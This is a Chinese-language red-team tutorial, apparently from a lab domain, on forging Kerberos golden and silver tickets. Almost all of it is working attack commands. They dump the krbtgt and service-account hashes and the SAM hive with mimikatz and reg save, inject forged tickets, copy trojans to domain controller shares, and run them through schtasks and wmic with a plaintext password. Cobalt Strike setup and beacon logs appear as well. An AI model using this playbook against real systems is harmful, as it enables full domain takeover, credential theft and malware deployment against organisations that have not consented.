红队-黄金票据白银票据

黄金票据Krbtgt账户介绍krbtgt用户是系统在创建域时自动生成的一个帐号其作用是密钥分发中心的服务账号其密码是系统随机生成的无法登录主机TGT是Krbtgt账户的NTLM Hash 加密sam文件SAM文件里存密码ntlm加密lm加密用户ridadmin500lm密文ntlm密文黄金票据都需要出网黄金票据需要的数据前提是目前已经控制了域控和域内机器用Viper获取信息viper自带msfshell whoami /user #获取域的sid值去掉最后的-500shell net config workstation #查看域信息如下ctfstu\administrator S-1-5-21-586581458-812751031-2814148090-500使用mimikatz工具通过viper上传shell mimikatz.exe lsadump::dcsync /domain:ctfstu.cn /user:krbtgtSAM Username : krbtgtAccount Type : 30000000 ( USER_OBJECT )User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )Account expiration : Password last change : 2026/6/22 10:57:41Object Security ID : S-1-5-21-586581458-812751031-2814148090-502Object Relative ID : 502Credentials:Hash NTLM:d8b85b01803efbcf11a3f71eba5fe7fentlm- 0: d8b85b01803efbcf11a3f71eba5fe7felm - 0: 93522dad83e1f4d36de1637ebf6d1097生成黄金票据Kerberos::golden /user:administrator /domain:ctfstu.cn /sid:S-1-5-21-586581458-812751031-2814148090 /krbtgt:d8b85b01803efbcf11a3f71eba5fe7fe /ptt在mimikatz里shell运行命令shell mimikatz.exe Kerberos::golden /user:administrator /domain:ctfstu.cn /sid:S-1-5-21-586581458-812751031-2814148090 /krbtgt:d8b85b01803efbcf11a3f71eba5fe7fe /ptt使用 dir 远程访问域控把木马传过去使用计划任务上线csshell copy benben.exe \\DC.ctfstu.com\C$ #传木马过去shell schtasks /create /s dc.ctfstu.com /tn test /sc onstart /tr c:\benben.exe /rusystem /f #创建计划任务shell schtasks /run /s dc.ctfstu.com /tn test #run 计划任务域控重新上线白银票据制作条件工具mimikatzmimikatz.exe sekurlsa::logonpasswords 以管理员身份运行mimikatz privilege::debug 提权ConbaltStrike服务端运行chmod x ./TeamServerImagechmod x teamserver ./teamserver 192.168.237.137 root客户端运行chmod x cobaltstrike-client.sh./cobaltstrike-client.sh添加监听如下shell mimikatz.exe lsadump::sam[06/23 02:30:34] beaconshell mimikatz.exe privilege::debug[06/23 02:30:34] [*] Tasked beacon to run: mimikatz.exe privilege::debug[06/23 02:30:35] [] host called home,sent: 60 bytes [06/23 02:30:45] [] received output: .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. A La Vie, A LAmour - (oe.eo) ## / \ ## /*** Benjamin DELPY gentilkiwi ( benjamingentilkiwi.com ) ## \ / ## https://blog.gentilkiwi.com/mimikatz ## v ## Vincent LE TOUX ( vincent.letouxgmail.com ) ##### https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) #privilege::debug Privilege 20 OKshell mimikatz.exe privilege::debug token::elevate lsadump::sam依次提权查看信息通过 reg 下载sam文件# 导出SAM配置单元到本地sam.hivereg save HKLM\SAM C:\tmp\sam.hive可以上传一个可以破解浏览器缓存密码的exe上去 ,shell xxx.exe执行获取信息mimikatz_x64.exe kerberos::tgt 查票mimikatz_x64.exe kerberos::purge 清票shell klist 查票shell klist purge 清票制作白银票据在windows 2008机器上伪造票据CIFS共享服务kerberos::golden /domain:域名 /sid:域SID /target:目标主机FQDN /service:服务类型 /rc4:服务账户NTLM哈希 /user:伪造用户名 /ptt/ptt 表示将生成的票据直接注入当前会话内存PassThe Ticket流程如下shell whoami /user #获取SID获取sid:S-1-5-21-586581458-812751031-2814148090shell net config workstation #查看域得到域名假如是ctfstu.cn获取域控Windows 2012(DC$)服务账号的NTLM hash值shell mimikatz_x64.exe sekurlsa::logonpasswords这里是获取rc4的值56738146d907ecc92a721698043790c7服务cifs是需要事先知道对方开的是什么服务控制win20031、在域控上获取基本信息shell whoami /user 获取域的sid值(去掉最后的‐500500表示为administrator用户)shell net config workstation 查看域得到域名为:ctfstu.com SID:S-1-5-21-586581458-81275103128141480902、获取Windows 2003(pc-2003$)的服务账号的NTLM hash值shell mimikatz_x64.exe sekurlsa::logonpasswords得到 hash 035d0e4f5da72df2d6175ffff1ecb4c3ec3、Windows 2008伪造票据(需要管理员权限)CIFS共享服务mimikatz_x64 kerberos::tgt 查票mimikatz_x64 kerberos::purge 清票shell klist 查票shell klist purge 清票shell mimikatz_x64.exe kerberos::golden/domain:ctfstu.com /sid:S-1-5-21-586581458-812751031-2814148090 /target:PC‐2003.ctfstu.com /service:cifs/rc4:035d0e4f5da72df2d6175ff1ecb4c3ec/user:dazhuang /ptt4、Windows 2008访问Windows 2003shell dir \\PC‐2003.ctfstu.com\c$5、访问计划任务启动木马CIFS获得目标计算机上任何Windows共享的管理权限HOST修改和创建计划任务HOST、RPCSS使用WMI在目标系统上远程远程执行命令命令shell mimikatz64 kerberos::golden/domain:ctfstu.com /sid:S-1-5-21-586581458-812751031-2814148090 /target:pc-2003.ctfstu.com /service:HOST/rc4:243e416a8e06af61b1a00db56f2d6831/user:administrator /ptt启动计划任务shell schtasks /create /s dc.ctfstu.com /tn test /sc onstart /tr c:\benben.exe /rusystem /f #创建计划任务shell schtasks /create /s pc-2003.ctfstu.com /tn test /sc onstart /trc:\calc.exe /ru administrator /fshell schtasks /run /s pc-2003.ctfstu.com /tn testwmic通过2008win来打2003win2008win不出网无法cs直接连以2008为跳板微软的工具——wmicwmic /user:administrator /password:Admin123 /node:192.168.41.40 process call create C:\ben.exe如下打开listener添加一个123的监听地址是2012的14444payloads里面选择第6个选中123添加通过之前的蚁剑or哥斯拉把文件传输到2012在控制2008的终端里把木马传给不出网的2003shell copy bb666.exe \\192.168.41.20\C$通过下面命令让2003执行木马文件wmic /user:administrator /password:Admin123 /node:192.168.41.20 process call create C:\bb666.exe但是有了黄金票据可以直接干shell wmic /node:192.168.41.20 process call create C:\bb666.exe